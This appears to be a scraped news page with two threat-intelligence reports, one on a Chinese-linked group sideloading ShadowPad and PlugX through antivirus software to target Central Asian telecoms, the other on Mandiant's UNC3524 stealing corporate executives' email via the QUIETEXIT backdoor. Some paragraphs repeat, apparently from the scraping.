Cybersecurity firm SentinelOne tied the intrusions to an actor it tracks under the name "Moshen Dragon," with tactical overlaps between the collective and another threat group referred to as Nomad Panda (aka RedFoxtrot).
"PlugX and

A Chinese-aligned cyberespionage group has been observed striking the telecommunication sector in Central Asia with versions of malware such as ShadowPad and PlugX.

Cybersecurity firm SentinelOne tied the intrusions to an actor it tracks under the name "Moshen Dragon," with tactical overlaps between the collective and another threat group referred to as Nomad Panda (aka RedFoxtrot).

"PlugX and ShadowPad have a well-established history of use among Chinese-speaking threat actors primarily for espionage activity," SentinelOne's Joey Chen said. "Those tools have flexible, modular functionality and are compiled via shellcode to easily bypass traditional endpoint protection products."

ShadowPad, labeled a "masterpiece of privately sold malware in Chinese espionage," emerged as a successor to PlugX in 2015, even as variants of the latter have continually popped up as part of different campaigns associated with Chinese threat actors.

Although known to be deployed by the government-sponsored hacking group dubbed Bronze Atlas (aka APT41, Barium, or Winnti) since at least 2017, an ever-increasing number of other China-linked threat actors have joined the fray.

Earlier this year, Secureworks attributed distinct ShadowPad activity clusters to Chinese nation-state groups that operate in alignment with the Chinese Ministry of State Security (MSS) civilian intelligence agency and the People's Liberation Army (PLA).

The latest findings from SentinelOne dovetails with a previous report from Trellix in late March that revealed a RedFoxtrot attack campaign targeting telecom and defense sectors in South Asia with a new variant of PlugX malware named Talisman.

Moshen Dragon's TTPs involve the abuse of legitimate antivirus software belonging to BitDefender, Kaspersky, McAfee, Symantec, and Trend Micro to sideload ShadowPad and Talisman on compromised systems by means of a technique called DLL search order hijacking.

In the subsequent step, the hijacked DLL is used to decrypt and load the final ShadowPad or PlugX payload that resides in the same folder as that of the antivirus executable. Persistence is achieved by either creating a scheduled task or a service.

The hijacking of security products notwithstanding, other tactics adopted by the group include the use of known hacking tools and red team scripts to facilitate credential theft, lateral movement and data exfiltration. The initial access vector remains unclear as yet.

"Once the attackers have established a foothold in an organization, they proceed with lateral movement by leveraging Impacket within the network, placing a passive backdoor into the victim environment, harvesting as many credentials as possible to insure unlimited access, and focusing on data exfiltration," Chen said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Caught Exploiting Popular Antivirus Products to Target Telecom Sector

A newly discovered suspected espionage threat actor has been targeting employees focusing on mergers and acquisitions as well as large corporate transactions to facilitate bulk email collection from victim environments.
Mandiant is tracking the activity cluster under the uncategorized moniker UNC3524, citing a lack of evidence linking it to an existing group. However, some of the intrusions are

A newly discovered suspected espionage threat actor has been targeting employees focusing on mergers and acquisitions as well as large corporate transactions to facilitate bulk email collection from victim environments.

Mandiant is tracking the activity cluster under the uncategorized moniker UNC3524, citing a lack of evidence linking it to an existing group. However, some of the intrusions are said to mirror techniques used by different Russia-based hacking crews like APT28 and APT29.

"The high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet set this group apart and emphasize the 'advanced' in Advanced Persistent Threat," the threat intelligence firm said in a Monday report.

The initial access route is unknown but upon gaining a foothold, attack chains involving UNC3524 culminate in the deployment of a novel backdoor called QUIETEXIT for persistent remote access for as long as 18 months without getting detected in some cases.

What's more, the command-and-control domains — a botnet of internet-exposed IP camera devices, likely with default credentials — are designed to blend in with legitimate traffic originating from the infected endpoints, suggesting attempts on the part of the threat actor to stay under the radar.

"UNC3524 also takes persistence seriously," Mandiant researchers pointed out. "Each time a victim environment removed their access, the group wasted no time re-compromising the environment with a variety of mechanisms, immediately restarting their data theft campaign."

Also installed by the threat actor is a secondary implant, a web shell, as a means of alternate access should QUIETEXIT stop functioning and for propagating the primary backdoor on another system in the network.

The information-gathering mission, in its final stage, entails obtaining privileged credentials to the victim's mail environment, using it to target the mailboxes of executive teams that work in corporate development.

"UNC3524 targets opaque network appliances because they are often the most unsecure and unmonitored systems in a victim environment," Mandiant said. "Organizations should take steps to inventory their devices that are on the network and do not support monitoring tools."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel